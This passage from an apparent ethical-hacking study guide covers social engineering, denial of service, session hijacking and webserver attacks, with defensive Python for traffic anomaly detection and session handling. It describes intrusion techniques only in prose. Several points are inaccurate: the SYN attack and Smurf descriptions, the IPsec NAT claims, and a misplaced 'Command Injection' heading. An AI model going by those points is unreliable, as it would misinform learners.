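On the constructed input the detector raises three alerts (the gateway moving at t=9, the workstation moving at t=10, and the gateway flapping back at t=11) and names de:ad:be:ef:00:01 as claiming both IPs. With the gateway pinned in trusted, the flap at t=11 is no longer an alert because the pinned binding was never overwritten.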

Spoofing Attacks
MAC Spoofing Attacks - When an attacker can sniff MAC addresses, they can use that information to spoof (duplicate) the MAC in question and receive the legitimate user's traffic. If the MAC address is used for network identification, the attacker now has whatever access the legitimate user had, bypassing MAC-based access control lists on routers and servers. Spoofed MAC addresses are also used in other network traffic attacks such as SYN floods and the Ping of Death. Countering spoofing attacks involves binding tables and checking that MAC addresses do not change IPs (or switch ports) on the switch they are connected to.

DNS Poisoning - The Domain Name System, which translates the names humans use into the numbers computers use, can be tricked by spoofing as well. A DNS server can be tricked into accepting false information, poisoning the cache of names used to answer clients' requests for a website or network resource. When a user requests a website from a poisoned DNS server, the user is sent to the location the attacker placed in the false record. To defend against these attacks, resolve all DNS requests through local resolvers that forward only to trusted outside DNS servers, and configure firewalls to restrict external DNS lookups so that users are forced to use the internal resolvers. DNSSEC (DNS Security Extensions) signs DNS records with public-key cryptography, in a chain of trust anchored at the root zone, so that a validating resolver can confirm that an answer is authentic; implementing it mitigates spoofing threats.

Sniffing Tools
Kismet (wireless network detector and sniffer), Snort (intrusion detection system, also usable as a packet logger), Wireshark (protocol analyzer)


Countermeasures
Sniffing with hardware requires physical access to the traffic being targeted. Securing the physical location of, and access to, network equipment keeps a packet capture device from being installed. Sniffing depends on traffic being in plaintext; encryption prevents this. TLS (SSL), SSH, and IPsec (Internet Protocol Security) are examples of encryption solutions: replacing Telnet and FTP with SSH and SFTP, and HTTP with HTTPS, removes most of the plaintext credentials carried by the vulnerable protocols listed above.


Module 9 Social Engineering Study Guide
Objectives:
. What is Social Engineering?
. Why is Social Engineering effective?
. Phases in a Social Engineering attack
. Common targets of Social Engineering
. Types of Social Engineering
. Common Intrusion Tactics and Strategies for Prevention
. Social Engineering through Impersonation on Social Networking Sites
. Risks of Social Networking to Corporate Networks
. Identity Theft
. Social Engineering Countermeasures
. Social Engineering Pen Testing


What is Social Engineering?
Social engineering is the art of manipulating people into performing actions or divulging confidential information. Social engineers prey on people who are careless about protecting confidential information.

Why is Social Engineering Effective?
. There is no specific software or hardware for defending against a social engineering attack
. Security policies are only as strong as their weakest link, and humans are the most susceptible factor
. It is difficult to detect social engineering attempts
. There is no method to ensure complete security from social engineering attacks

Phases in a Social Engineering Attack
Research - Researching the target company: dumpster diving, websites, employees, company tours, etc.
Develop - In this phase relationships are built with selected employees; impersonations may be developed as well.
Exploit - Collect sensitive account information, financial information, and details of the technologies in use.

Command Injection Attacks
Online - Contacting employees anonymously over the Internet and persuading them to provide information
Telephone - Requesting information, usually by impersonating a legitimate user, either to access the telephone system itself or to gain remote access to computer systems
Personal Approaches - In personal approaches, attackers get information by asking for it directly

Common Targets of Social Engineering
Receptionists and help desk personnel, technical support, executives, system administrators, vendors of the target organization, users and clients

Types of Social Engineering
Human-based - Gathers sensitive information by interaction. Attacks of this category exploit trust, fear, and the helping nature of humans. An attacker can pose as a legitimate end user, a technical support person, or essentially anyone they feel will persuade someone to reveal information.
Eavesdropping - Unauthorized listening to conversations or reading of messages; interception of any form, such as audio, video, or written.
Shoulder Surfing - Attackers look over someone's shoulder, or view a target with binoculars, to gain confidential information.
Dumpster Diving - Searching for useful documents or any other information in trash bins, at printer stations, or on someone's desk.
Tailgating - An unauthorized person enters a secured area by following closely behind an authorized person, gaining access without the need for a key. This is done without the consent of the authorized user.
Piggybacking - Essentially the same principle as tailgating, except that here the unauthorized person has consent: the authorized person lets the unauthorized individual in with their credentials.
Reverse Social Engineering - The attacker creates a persona who appears to be in a position of authority, so that employees ask him for information rather than the other way around. These attacks involve sabotage, marketing, and tech support: cause a problem, advertise yourself as the one who can fix it, then "help".
Computer-based - Social engineering carried out with the help of computers.
Pop-Ups - Can be used to trick users into clicking a link that redirects them to fake websites asking for personal information, or that downloads malicious programs such as keyloggers, Trojans, or spyware.
Phishing - An illegitimate email falsely claiming to be from a legitimate site attempts to acquire the user's personal or account information.
Social Engineering using SMS
Insider Attacks
Spying - If a competitor wants to damage your organization, steal critical secrets, or put you out of business, they just have to find a job opening, prepare someone to pass the interview, have that person hired, and they are inside the organization.
Revenge - It takes only one disgruntled person taking revenge and your company is compromised. Some 60% of attacks occur from behind the firewall, and an inside attack is easy to launch and difficult to prevent.

Common Intrusion Tactics and Strategies for Prevention

Area of Risk | Attacker's Tactics | Combat Strategy
Phone (help desk) | Impersonation and persuasion | Train employees never to reveal passwords or other information over the phone
Building entrance | Unauthorized physical access | ID badge enforcement, staff training, security officers
Office | Shoulder surfing | Frosted glass; do not let others watch you type
Phone (help desk) | Impersonating help desk calls | Assign a PIN to employees for help desk calls
Office | Wandering strangers | Escort all guests
Mail room | Insertion of forged memos | Lock and monitor the mail room
Machine room / phone closet | Attempting to gain access, remove equipment, or attach rogue wireless access points or protocol analyzers | Keep these spaces locked and keep updated inventories
Phone and PBX | Stealing phone access | Control overseas and long-distance calls, trace calls, refuse transfers

Social Engineering through Impersonation on Social Networking Sites
Malicious users can gather information by impersonating others on social networks. This lets an attacker build large networks of "friends" from whom to extract information using social engineering techniques. They can also use this information to carry out other forms of social engineering outside of the social network.

Risks of Social Networking to Corporate Networks
Data Theft - A social networking site is an enormous database accessed by many individuals, increasing the risk of information exploitation.
Involuntary Information - In the absence of a strong policy, employees may unknowingly post sensitive data about their company on social networking sites.
Targeted Attacks - Information on social networking sites can be used for preliminary reconnaissance in a targeted attack.
Network Vulnerability - All social networking sites are subject to flaws and bugs that may lead to vulnerabilities in the company's network.

Identity Theft
Identity theft is a form of fraud in which someone pretends to be someone else by assuming that person's identity, typically in order to access resources or obtain credit and other benefits in that person's name.
Theft of Personal Information - Identity theft occurs when someone steals your name and other personal information for fraudulent purposes.
Loss of Social Security Numbers - A crime in which an imposter obtains personal information, such as Social Security or driver's license numbers.
Easy Methods - Cyberspace has made it easier for an identity thief to use stolen information for fraudulent purposes.

Social Engineering Countermeasures
Policies - Good policies and procedures are ineffective if they are not taught and reinforced with the employees. After receiving training, employees should sign a statement acknowledging that they understand the policies and the ramifications of not upholding them.
Training - An efficient training program should cover all security policies and the various methods used to raise awareness of social engineering. Being aware of the psychological techniques people tend to succumb to empowers users: they recognize these techniques when they see them used in the future.
Operational Guidelines - Ensure the security of sensitive information and the authorized use of resources.
Classification of Information - Categorize information as top secret, proprietary, for internal use only, for public use, etc.
Background Checks and Proper Termination Procedures - Insiders with criminal backgrounds and terminated employees are easy targets for procuring information.
Access Privileges - There should be administrator, user, and guest accounts with proper authorization, each granted only what its role needs.
Proper Incident Response Time - There should be proper guidelines for reacting to a social engineering attempt.
Two-Factor Authentication - Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs, modem pools, and wireless networks.
Anti-Virus/Anti-Phishing Defenses - Use multiple layers of anti-virus defenses at end-user desktops and mail gateways to minimize social engineering attacks.
Change Management - Change management is a structured approach to transitioning individuals, teams, and organizations from a current state to a desired future state. A documented change-management process is highly effective and proactive; an employee-dependent, undocumented approach is reactive and could harm productivity.

Social Engineering Pen Testing
Gaining Authorization - Obtain management's explicit authorization and the details that will help in defining the scope of the pen test. These details may consist of a list of departments, the individual employees to target, and the level of physical intrusion allowed.
Intelligence Gathering - Collect email addresses and contact details of the target organization and its people (if not already provided) using techniques such as dumpster diving, email address guessing, web searches, and email spider tools. Try to extract as much information as possible using footprinting techniques.
Create a Script - Based on the collected information, create believable impersonations, storylines, etc. to attack the target.
Use Emails - If management approves social engineering via email, use phishing techniques and impersonation and send malicious attachments. You are assessing how email attacks are treated by the organization and how much confidential information can be obtained.

Pick Up the Phone - Call a target posing as a colleague, an important customer, or tech support, or refer to an important person in the organization, to gain information.
In Person - Be creative and convincing. Befriend employees, pose as an external auditor, or throw on some coveralls and impersonate a technician; these are all believable characters to play. Use tailgating to gain physical access and create fake badges. Once inside, eavesdrop and shoulder surf. Meet employees in the break room and strike up a conversation.
Documentation - Document EVERYTHING: the responses from the users, security staff, and anyone you come into contact with (video makes for a convincing form of documentation); what information was obtained and what weaknesses allowed you to collect confidential information. There is never a problem with too much detail in a report. All of this documentation is important to management as it helps them improve their security posture.


Module 10 Denial of Service Study Guide
Objectives:
. What are DoS and DDoS attacks?
. Symptoms of a DoS attack
. DoS Attack Techniques
. Botnets
. Detection Techniques
. DoS/DDoS Attack Countermeasures
. DoS Attack Penetration Testing


What are DoS and DDoS Attacks?
Denial of Service refers to making a web site or service unavailable to users for a period of time. A DoS attack becomes a war of attrition: does the attacker have more bandwidth or CPU power than the victim?
Websites are a common target for DoS attacks. If enough clients (real or machine-generated) put load on a website, the web server tasked with handling the requests becomes slow or unable to accept new connections. The website code itself may require too much processing power per request. Depending on the attack, an attacker may be able to use all of the bandwidth available to the web server.
One common form of DoS is a Distributed Denial of Service (DDoS), where the attacker has multiple computers under their control to distribute the attack. These attacks often use botnets, sets of computers controlled like robots to do a controller's bidding. They can be directed with simple commands and are frequently used without the actual owner's knowledge.
An attacker uses up the available resources by exploiting specific vulnerabilities or by mounting a distributed attack through another network such as a botnet. DoS and DDoS work by flooding a computer or network with specifically crafted queries, or simply by using more bandwidth to connect to the target than the target has available to respond to the requests.

Symptoms of a DoS Attack
Symptoms may include a website being knocked down, a large influx of spam, or an inability to access the Internet. Connection-monitoring features in routers, or a separate device, will trigger alerts for this type of traffic. These alert thresholds are often set at whatever level the network admin is comfortable with, rather than derived from measured baseline traffic, which creates a false sense of security.

A web stress test, such as those used by Massively Multiplayer Online game developers, functions the same way in a legitimate, controlled fashion to show the breaking point of a set of servers. Malicious hackers can use the same tools and simply keep going past the breaking point to bring down the target.

Who uses DoS/DDoS
Cyber criminals are increasingly associated with organized crime syndicates. These organizations provide a hierarchical setup that combines various activities and technical skills to make sophisticated attacks. Organized groups create and rent botnets, offer services such as malware writing and hacking bank accounts, or mount Denial of Service attacks against targets for a price. According to Verizon's 2010 Data Breach Investigations Report, the majority of breaches were driven by organized groups, and 70% of the data stolen was the work of criminals outside the victim organization. Organized hacktivism is a matter of concern for national security agencies.

DoS Attack Techniques

Bandwidth Attack
All bandwidth is used up by an attack, leaving none for legitimate users. This type of attack is normally conducted as a Distributed Denial of Service. Some hosting companies allow for ramping up more bandwidth during an attack, but the cost of this service can be prohibitive for many companies.

Service Request Floods
A service request flood works by exhausting server resources. Requests are made from a valid source, or a spoofed valid source, with the intention of using up TCP connections. When the threshold for connections is met, the server can no longer answer requests, denying the service to other users.

SYN Attack
An attack exploits the three-way handshake by creating spoofed SYN packets. This attack causes the server to send ACKs to the fake source of the SYN packets. This floods the spoofed source system with ACK traffic, keeping that system from responding to other traffic.

SYN Flooding
SYN flooding works the same as a SYN attack, but instead of sending ACKs to a target, it uses the half-open connections to overload the listening queue on the server. This keeps the server's ability to respond offline for a period of time, depending on the implementation.

ICMP Flood Attack
A large number of packets with fake source addresses are sent to the target. Whether the target accepts the pings or not, the ping traffic overloads the target. This attack is also known as a Smurf attack.

Peer to Peer Attacks
Using p2p clients and the DC++ protocol, an attacker can instruct other computers on the p2p network to disconnect and connect to a website. Given the massive number of users connected to some of these networks, this creates a DoS attack.

Permanent Denial of Service
This attack is also referred to as Phlashing. An attacker sends a fake update that causes a user or system to load software that damages the hardware or bricks the system.

Application Level Flood Attacks
These attacks occur higher on the OSI model than most flood attacks. Using applications such as email clients or web logins, an attack exploits the program itself to create a flood of traffic. These can also occur with programs that use a database, by using crafted queries to jam access to the database.

Botnets
Botnets are huge networks that can be commanded to undertake actions on behalf of the "bot herder". Botnets are created by passing the controlling software to users and networks by several means. Trojans are a leading cause, such as Shark and Poison Ivy.

Command and Control, ICQ, IRC
Older internet communications such as ICQ and IRC are very lightweight and able to be used to relay commands to a zombie computer in a botnet. Internet Relay Chat is built in to some botnet creation tools. When a hacker configures the botnet they can create the callback that allows the bots to come to a specific IRC chat channel and receive commands from the master control. This allows a bot herder to issue commands anonymously.

DDoS
Botnet software operates like a Trojan. It is covertly installed, then it dials back to its command center. The compromised computer is now a bot. One new trend with Anonymous is to use the Low Orbit Ion Cannon, which users can point at a website by themselves or opt in to an attack.

Detection Techniques
Teaching a computer the difference between legitimate traffic and attacks is constantly being tested. Once one pattern is found, the human hacker evolves faster than the computer program. The current standard is to use abnormality and noticeable-deviation thresholds, which do not always work. Wavelet Analysis describes the input by its spectral components; it looks for anomalies in the frequency of information to determine the normal frequency versus the one seen during an attack. Sequential Change-Point Detection uses algorithms to isolate traffic statistics that change during attacks. Data is initially filtered by address, port, or protocol, and then compared against the deviations seen during an attack.
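The contrast between a fixed deviation threshold and sequential change-point detection, as an added example that is not part of the study guide. The per-second request counts below are constructed, the detector is a one-sided CUSUM (a standard sequential change-point algorithm, not a specific product's), and the threshold values k, h and clip are assumptions chosen for the sample. The first 20 seconds serve as the filtered baseline; a single burst at second 21 trips the static threshold but not CUSUM, while the sustained flood beginning at second 28 trips CUSUM within three seconds.

```python
"""Sequential change-point detection over per-second request counts."""
from statistics import mean, pstdev

# Constructed sample data (not real traffic): 20 s of normal traffic used as
# the baseline, one isolated burst at second 21, then a sustained flood that
# starts at second 28.
BASELINE = [48, 52, 50, 47, 53, 49, 51, 50, 48, 52,
            50, 49, 51, 47, 53, 50, 48, 52, 49, 51]
QUIET_TAIL = [50, 95, 49, 51, 50, 48, 52, 50]
FLOOD_TAIL = [140, 210, 380, 520, 610, 650]
SAMPLE_COUNTS = BASELINE + QUIET_TAIL + FLOOD_TAIL   # burst, then flood
SAMPLE_QUIET = BASELINE + QUIET_TAIL                 # burst only, no flood


def _baseline_stats(counts, baseline_len):
    """Mean and standard deviation of the first baseline_len samples."""
    if len(counts) <= baseline_len:
        raise ValueError("need more samples than baseline_len")
    base = counts[:baseline_len]
    return mean(base), (pstdev(base) or 1.0)   # guard a perfectly flat baseline


def static_threshold_alarm(counts, baseline_len=20, n_sigma=3.0):
    """First index whose count exceeds mean + n_sigma * stdev, else None.

    This is the 'noticeable deviation' rule: one busy second is enough.
    """
    mu, sigma = _baseline_stats(counts, baseline_len)
    limit = mu + n_sigma * sigma
    for i in range(baseline_len, len(counts)):
        if counts[i] > limit:
            return i
    return None


def cusum_alarm(counts, baseline_len=20, k=1.0, h=5.0, clip=3.0):
    """First index at which CUSUM declares a sustained upward shift, else None.

    Each sample becomes a standardised deviation z, clipped to at most
    `clip` so that a single burst cannot trip the detector on its own.
    The statistic accumulates (z - k), resets at zero, and alarms once it
    exceeds h. With k=1, h=5, clip=3, roughly three consecutive seconds at
    three sigma or more are needed before an alarm.
    """
    mu, sigma = _baseline_stats(counts, baseline_len)
    s = 0.0
    for i in range(baseline_len, len(counts)):
        z = min((counts[i] - mu) / sigma, clip)
        s = max(0.0, s + z - k)
        if s > h:
            return i
    return None


if __name__ == "__main__":
    print("static threshold alarm at second", static_threshold_alarm(SAMPLE_COUNTS))
    print("CUSUM alarm at second", cusum_alarm(SAMPLE_COUNTS))
    print("CUSUM on the quiet series:", cusum_alarm(SAMPLE_QUIET))
```

In production the same loop would run per filtered key (source address, destination port or protocol), with the baseline re-estimated from known-good periods rather than from the first seconds of a capture.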

DoS/DDoS Attack Countermeasures
Countermeasure strategies:
1. Absorb
2. Degrade
3. Accept

To absorb an attack requires the resources and planning to scale your infrastructure above the hacker's ability to generate traffic. This requires significant planning and capital.

Degrading the services you provide means turning off non-critical services. This allows your critical services the bandwidth or resources to run. If the non-critical services are the ones being attacked, this may thwart the attack.

A third option is to accept the attack, turning off your outside connections, or allowing them to be down for as long as the attack continues. (Let the terrorists win? Too soon?)

Mitigation and Prevention
Filtering traffic is one method to prevent DoS. Ingress and egress filters determine whether traffic is coming from the correct location, blocking the traffic if it does not match. However, this can be defeated by spoofing.

Mitigate with load balancing and throttling. Disable unused and insecure services. Block all inbound packets originating from the service ports. Configure the firewall to deny external Internet Control Message Protocol traffic. Depending on how external internet access is set up, organizations may be able to prevent the transmission of fraudulently addressed packets at the ISP level.

DoS Penetration Testing
DoS testing involves finding out roughly what the minimum thresholds are for DoS compared to attacks. Once the target is flooded with traffic, the findings about response time are what is desired. Depending on the target and scope of the engagement, DoS pen testing may involve port flooding, email flooding, or website stress testing. Be cautious and be sure to have explicit permission to do this type of test.

Honeypots or honeynets can be used to deflect attacks to a less critical network section. Creating a system or network that looks like your production system but does not have the sensitive data can be difficult and time consuming.


Module 11 Session Hijacking Study Guide
Objectives:
. What is Session Hijacking
. Key Session Hijacking Techniques
. Spoofing vs. Hijacking
. Session Hijacking Process
. Types of Session Hijacking
. Session Hijacking in OSI Model
. Application Level Session Hijacking
. Network Level Session Hijacking
. TCP/IP Hijacking
. Session Hijacking Tools
. Countermeasures
. IPSec Architecture

What is Session Hijacking?
Session hijacking is the exploitation of a valid computer session; it occurs when a hacker takes over a session of communication between two computers. This is used to get access to the system and to steal data. TCP/IP is the most commonly attacked protocol due to weaknesses in its design and because it is used in most communication.

Session hijacking can be difficult to counter without encryption. Compromised sessions can allow for information and identity theft in a difficult-to-trace manner. Most computers use TCP/IP to communicate, which is what session hijacking targets. All of this makes session hijacking a very big threat. Vulnerabilities that allow session hijacking include: not having lockouts for sessions, indefinite session times, insecure handling of session IDs, and clear text transmission of data including the session identifier. Any of these vulnerabilities can lead to exploitation.

Key Session Hijacking Techniques
Stealing session IDs can occur whenever they are transmitted during the session. Sniffing and interception are common methods. A referrer attack is one method: using a link to another site, the hacker entices the victim to click on the link, which causes the browser to send the referrer URL, which contains the session ID.

Calculating a session ID can be easily accomplished if session IDs have no random components.

Brute forcing session IDs occurs when there is no mechanism to stop an attacker from trying random session IDs until they are successful. This requires a limited field of possible session IDs in order to succeed.

Spoofing vs. Hijacking
Spoofing occurs when an attacker pretends to be a valid user. Hijacking occurs when an attacker takes over a valid user's session. Spoofing requires a hacker to be able to get credentials or other identifiers. Hijacking requires a hacker to be able to find an existing session, usually requiring sniffing.

Session Hijacking Process
1. Sniff
2. Monitor, in order to predict sequence numbers
3. Session disconnect of valid user
4. Session ID prediction to take over the session
5. Command injection to communicate with target system

Session Hijacking in OSI Model
Network level hijacking involves intercepting packets in a TCP or UDP session. This requires access to network traffic, which can be accomplished remotely by use of a Trojan or by use of packet sniffers on a network or device.

Application level hijacking gains control of an HTTP user session by sniffing the session ID cookie or packet used to keep track of a user's session on the website.

Application Level Session Hijacking
There are multiple methods for gaining control of a session at the application level:
1. Session Sniffing
2. Predictable Session Token
3. Man in the middle attacks
4. Client side attacks

Session Sniffing
Using a sniffer, an attacker can capture a valid session token and present it to the webserver. If there is no mechanism for checking the validity of the token, it can be used by the attacker to gain access to the session.

Predicting Session Tokens
When webservers use a predictable method for generating session IDs, it is possible to guess what session IDs will be and use that guess to access the server. One example of this is a webserver session that uses a constant bit of data and adds the date and time to that constant to create a unique session ID.

Man-in-the-Middle Attacks
A man-in-the-middle attack occurs when the hacker is able to place themselves into a communication between a client and server. When the client and the server are not able to confirm each other's identities, or if they can be fooled, a man-in-the-middle attack can occur. The attacker takes the communication from the client and then passes it on to the server. The attacker can modify or insert data after reading what the packet contains. This can occur in HTTP transactions by manipulating the browser or by tricking a user into using the attacker's machine as a proxy.

Client-side Attacks
Client-side attacks use methods of getting the session ID stored in a cookie to compromise a session. If the session ID is stored in a plaintext cookie, it could be used to give the attacker access to the client session. A cross-site scripting attack uses XSS to make the client send or show cookie information that can then be used to hijack the session. The same type of information can be gained using malicious JavaScript or by use of a Trojan. Once the attacker has the session ID information, it is formatted into a JavaScript-type request to enter the session through a web browser.

Session Fixation is a technique where an attacker with a legitimate session ID issued by a server tricks a victim into using that session ID to authenticate. This removes the attacker's need to identify the session used, because they already have that information. There are three common methods used to pass this session information from the user to the server: the token being in the URL argument, hiding it in a hidden form field on the website, or placing it in a cookie which is installed into the browser.
Network Level Session Hijacking
Network level session hijacking takes advantage of how the network protocol exchanges information to gain a foothold at this lower level, giving an attacker an advantage in compromising higher level communication. When the three-way handshake is used, the sequence numbers used by the client and server are exchanged to give a sense of flow and order to the communication. These sequence numbers are the target of a network level session hijack attempt.

Sequence Number Prediction attacks use this knowledge of the handshake to send a connection attempt to a server with the correct sequence number along with a forged source IP address, which can allow a denial of service to the true IP or close the connection with a FIN bit.

TCP/IP Hijacking
TCP/IP hijacking is a technique using spoofed network packets to take over a session between client and target. This requires that you are on the same network as the target system and able to spoof the IP address of the client. First, an attacker sniffs traffic to determine the sequence numbers in the communication. Then the hacker spoofs the IP and sends a packet with the next sequence number. The host accepts that packet, increments the sequence number and sends an ACK to the client. The client considers this packet out of sequence and disregards it as valid, which allows the attacker to step in and continue the communication as if he were the victim.

Source Routed packets can be used by an attacker to specify what path the packets in a communication should take. The attacker directs the packets to pass through a specific device for sniffing.

RST Hijacking refers to the technique of sending a forged RST packet to a victim, causing them to end the session. Once this session is closed the victim may attempt to reset the connection with the hacker, or the hacker may create a denial of service by repeating the process.

Blind Hijacking occurs when a hacker can inject data into a communication but is not able to route the communication to sniff the results.

Man-in-the-Middle Attack using Packet Sniffers
With a packet sniffer installed on a device, any data that passes through that device can be used in a man-in-the-middle attack. Using an Address Resolution Protocol spoof, an attacker can pose as another device that a client uses to connect to a host. Forged Internet Control Message Protocol packets can also be used to direct client-to-server traffic through a hacker's packet sniffer. An example of this would be a hacker with a laptop in a coffee shop posing as a wireless access point. Clients connect unknowingly to the hacker's access point and the hacker sniffs the traffic that then goes on to the internet.

UDP Hijacking
UDP does not deal with sequence numbers as TCP does; however, if the attacker can send a response back to a client after a request before the server does, the attacker can take over the communication.

Session Hijacking Tools
Burp Suite is a proxy that allows for the inspection and modification of traffic. This is the tool commonly used in our practice.

Firesheep is the now-defunct Firefox add-on that allowed anyone who tried it out to hijack sessions of popular sites such as Facebook and Twitter. Read http://codebutler.github.com for more information.

Countermeasures
All session hijacking relies on plaintext communication. Encryption can be used to keep individual pieces of information such as user names, passwords, and session IDs unreadable. Session IDs should be randomly generated on request. This handles the vulnerability of a person being tricked into using a specific, attacker-generated session. Sessions should also have absolute time outs so that they cannot be used after a valid user is disconnected. Network traffic should not allow source routing of packets. Using encrypted and secure protocols also thwarts session hijacking.
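Server-side session handling that applies the countermeasures just listed (random IDs, no reuse of an attacker-supplied ID at login, absolute and idle timeouts, rejection of IDs the server never issued), as an added example that is not code from the study guide or from any product. The SessionStore class, its timeout constants and the `now` clock parameter are assumptions made for the example; the predictable generator is included only to show the weak "constant plus timestamp" scheme the Predicting Session Tokens section describes.

```python
"""Hardened server-side session store (hypothetical, for illustration)."""
import secrets
import time

ABSOLUTE_LIFETIME = 8 * 3600   # assumed: seconds a session may live regardless of use
IDLE_TIMEOUT = 15 * 60         # assumed: seconds of inactivity before lockout


def predictable_session_id(constant, when):
    """The weak scheme from the guide: a fixed string plus a timestamp.
    Anyone who knows the constant and the approximate login time can
    enumerate the ID. Shown for contrast only."""
    return f"{constant}-{int(when)}"


def random_session_id():
    """128 bits from the OS CSPRNG, URL-safe; not guessable or calculable."""
    return secrets.token_urlsafe(16)


class SessionStore:
    def __init__(self):
        self._sessions = {}   # session id -> {"user", "created", "last_seen"}

    def create(self, now=None):
        """Issue an anonymous (pre-login) session with a random ID."""
        now = time.time() if now is None else now
        sid = random_session_id()
        self._sessions[sid] = {"user": None, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid, now=None):
        """Return the live record for sid, or None when the ID is unknown,
        past its absolute lifetime, or idle too long. Dead sessions are
        deleted on sight, so an old ID cannot be replayed later."""
        now = time.time() if now is None else now
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        expired = now - rec["created"] > ABSOLUTE_LIFETIME
        idle = now - rec["last_seen"] > IDLE_TIMEOUT
        if expired or idle:
            del self._sessions[sid]
            return None
        rec["last_seen"] = now
        return rec

    def login(self, sid, user, now=None):
        """Bind a user to the session and rotate the ID. An ID the attacker
        planted before authentication (session fixation) is discarded, so
        knowing it gains nothing. Returns the new ID, or None if sid was dead."""
        now = time.time() if now is None else now
        rec = self.lookup(sid, now)
        if rec is None:
            return None
        del self._sessions[sid]
        new_sid = random_session_id()
        rec["user"] = user
        rec["created"] = now        # absolute lifetime counts from authentication
        rec["last_seen"] = now
        self._sessions[new_sid] = rec
        return new_sid

    def logout(self, sid):
        """Explicit termination; the ID is never valid again."""
        self._sessions.pop(sid, None)
```

Transport is the other half: the ID must travel only in a cookie flagged Secure and HttpOnly over TLS, otherwise the sniffing and client-side techniques above still apply.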

IPSec
IPSec is a set of protocols developed to secure communication at the network layer. It is often used in Virtual Private Networks. IPSec provides:
1. Network-level Peer Authentication
2. Data Integrity
3. Data Confidentiality
4. Replay Protection
5. Data Origin Authentication

IPSec uses two modes: Transport and Tunnel. Transport mode authenticates the communication between computers. This mode does have the ability to encrypt the actual data payload of the packets and does work with Network Address Translation (NAT). Tunnel mode encapsulates the whole packet, not just the data payload. The entire packet is encrypted then encapsulated. Tunnel mode supports NAT traversal.

IPSec uses Authentication Headers (AH) to ensure that the data is what it says it is (integrity) and came from where it says it came from (origin authentication). This also provides a countermeasure to replay attacks. The Encapsulating Security Payload (ESP) is used to keep the information in a packet confidential. IPSec implementations may include AH, ESP, or both to provide for data security.

SA or Security Association is the third component of IPSec. The IPSec architecture uses the concept of a security association as the basis for building security functions into IP. A security association is simply the bundle of algorithms and parameters (such as keys) that is being used to encrypt and authenticate a particular flow in one direction. Therefore, in normal bi-directional traffic, the flows are secured by a pair of security associations.


Module 12 Hacking Webservers Study Guide
Objectives:
. Webserver Threats
. Web Application Attacks
. Webserver Attack Tools
. Countermeasures
. Defending Against Webserver Attacks
. What is Patch Management?
. Patch Management Tools
. Webserver Security Tools
. Webserver Pen Testing

Webserver Threats
Webservers exist to provide information or resources to the public. This creates a partially open door for malicious hackers, who can then concentrate on forcing it open the rest of the way. Webservers can be vulnerable to attacks that target the website or web application itself, or to attacks that allow a foothold into a target's environment.

Web Application Attacks
Directory Traversal attacks exploit a vulnerability in how the server communicates with the client to tell it to change the directory for the client. This enables a hacker to view files outside the web directory and execute commands. This is covered in detail in the next module.

HTTP Response Splitting attacks occur when a malicious hacker inserts data into a request, like an HTTP request, that causes the server to split the response, allowing the hacker to control some of the return. The vulnerability is the unvalidated input allowed by the web application on the server. Proper URL encoding and disallowing codes for a carriage return will prevent this attack.

HTTP Response Hijacking occurs when a hacker can use the technique above to send a response to a victim from the vulnerable server and then use the information the victim was transmitting to receive the response to that request.

Web Cache Poisoning puts a malicious website into a web server's cache as a legitimate site. This occurs when a DNS server is vulnerable to accepting cache information from untrusted sources. The attacker issues a command to flush the caches and then sends a request that creates the malicious entry.

Other webserver attacks target the encryption between the client and server, or the password used to authenticate, when these are vulnerable.

Webserver Attack Tools
Metasploit is a penetration testing toolkit. This toolkit allows ethical hackers to test systems, but can be used by malicious hackers to run exploits against webservers. Metasploit uses known vulnerabilities to create payloads, files that contain the code needed to successfully exploit these vulnerabilities.

Countermeasures
Countermeasures for webserver attacks can be divided into updates, protocols, accounts, and file structure.

Updates and patches for the server OS of the webserver should be applied in a regular fashion, after testing in a non-production environment.

Protocols used by the webserver should be limited to only the ones required for operation. Insecure protocols such as telnet, SMTP, and FTP should not be in use on a webserver. Remote access should be encrypted or disabled.

All default accounts should be disabled. All accounts that are used by the webserver should have as little privilege as possible and require strong passwords. These accounts should have logon auditing, with alerts on failed logons, to combat dictionary and brute force password attacks.

Directory structure listing should be disabled. Any non-web files such as logs and backups should be removed from the server.

Defending Against Webserver Attacks
Defending against web server attacks requires a defense in depth approach to ensure that all attack vectors have been guarded against. The more ports that are open and applications that are running on a web server, the more opportunities there are for hacking. Every service and connection should be run with a least privilege account. The server itself needs to be hardened and accessed physically only when necessary. It should not be connected to the internet until after it has been hardened. If web applications are running that require a database backend, that database should be on a separate server. Audit logs should also be kept on a separate server.

What is Patch Management?
Patch management is the process of ensuring that all systems are using the appropriate and up-to-date software for the hardware or software asset. Developing a good patch management system is critical to keeping systems secure. A good patch management program will follow these steps:
1. Accurately inventory all hardware and software assets.
2. Determine an acceptable update window based on criticality.
3. Test all updates adequately prior to placing them in the production environment.
4. Install patches within the update window stated in step 2.
5. Document any exceptions to the program.

Be sure to test updates in a non-production environment. It is important to ensure that you have a window of time for updating critical systems that will not be too soon after the patch is released. Patches might break critical software. Being sure that all patches are applied on a regular basis to all systems is critical.

Patch Management Tools
The Microsoft Baseline Security Analyzer is an example of a free patch assessment tool that can check for known vulnerabilities caused by missing patches.

Webserver Security Tools
SAINT
The System Administrator's Integrated Network Tool is a popular software package that can be used to assess and test webserver security. It is capable of fully automated scans and can be used for specific exploitation.

HackAlert
HackAlert is a cloud-based service for monitoring and vulnerability assessment. This Software as a Service (SaaS) can also be tied into Web Application Firewalls.

Webserver Pen Testing
Penetration testing webservers encompasses most of the entire pen testing spectrum. Web servers require footprinting, scanning, enumeration of user accounts and ports, website vulnerability assessment, OS assessment, and specific attack testing. All of these steps must be carried out and documented to perform a full penetration test. After the vulnerabilities are known, exploits may be attempted to assess the extent of the vulnerability and determine what information can be compromised.


Module 13 Hacking Web Applications Study Guide
Objectives:
. Introduction to Web Applications
. Web Application Components
. Web Application Architecture
. Unvalidated Input
. Parameter/Form Tampering
. Injection Flaws
. Cross-Site Scripting (XSS) Attacks
. Hidden Field Manipulation Attack
. How Web Applications Work
. Hacking Methodology
. Web Application Hacking Tools
. How to Defend Against Web Application Attacks
. Web Application Security tools
. Web Application Firewalls
. Web Application Pen Testing
. Web Services Attack

Introduction to Web Applications
Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.

Web Application Components
Web attack vectors are paths or means to attack and gain access to computer or network resources. For example: parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross site scripting (XSS).

Unvalidated Input
